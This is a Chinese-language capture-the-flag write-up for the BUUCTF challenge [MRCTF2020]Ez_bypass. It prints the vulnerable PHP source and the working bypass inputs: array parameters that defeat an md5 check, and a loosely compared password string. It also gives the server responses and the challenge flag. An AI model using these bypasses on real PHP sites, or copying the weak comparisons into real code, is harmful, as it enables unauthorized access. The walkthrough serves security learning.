BUUCTF WEB [MRCTF2020]Ez_bypass

BUUCTF WEB [MRCTF2020]Ez_bypass

---

• 进入环境，提示

  I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { echo 'You got the first step'; if(isset($_POST['passwd'])) { $passwd=$_POST['passwd']; if (!is_numeric($passwd)) { if($passwd==1234567) { echo 'Good Job!'; highlight_file('flag.php'); die('By Retr_0'); } else { echo "can you think twice??"; } } else{ echo 'You can not get it !'; } } else{ die('only one way to get the flag'); } } else { echo "You are not a real hacker!"; } } else{ die('Please input first'); } }Please input first
  

• 可以推测网站源码为

  I put something in F12 for you
  include 'flag.php';
  $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';
  if(isset($_GET['gg'])&&isset($_GET['id'])) {
      $id=$_GET['id'];
      $gg=$_GET['gg'];
      if (md5($id) === md5($gg) && $id !== $gg) {
          echo 'You got the first step';
          if(isset($_POST['passwd'])) {
              $passwd=$_POST['passwd'];
              if (!is_numeric($passwd))
              {
                   if($passwd==1234567)
                   {
                       echo 'Good Job!';
                       highlight_file('flag.php');
                       die('By Retr_0');
                   }
                   else
                   {
                       echo "can you think twice??";
                   }
              }
              else{
                  echo 'You can not get it !';
              }
  
          }
          else{
              die('only one way to get the flag');
          }
  }
      else {
          echo "You are not a real hacker!";
      }
  }
  else{
      die('Please input first');
  }
  }Please input first
  
  

• 第一层过滤

   if (md5($id) === md5($gg) && $id !== $gg)
  

  可以上传数组进行绕过

  ?id[]=1&gg[]=2
  

  回显

  Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48
  
  Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48
  You got the first steponly one way to get the flag
  

• 第二层过滤

  if (!is_numeric($passwd)) {
      if($passwd==1234567) {
  

  此处为PHP弱类型比较，只需要上传

  passwd=1234567a
  

  回显

  Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48
  
  Warning: md5() expects parameter 1 to be string, array given in /var/www/html/index.php on line 48
  You got the first stepGood Job!  By Retr_0
  

• 得到flag

  flag{de31e5a6-2a6a-4c56-b55a-59e4f662af84}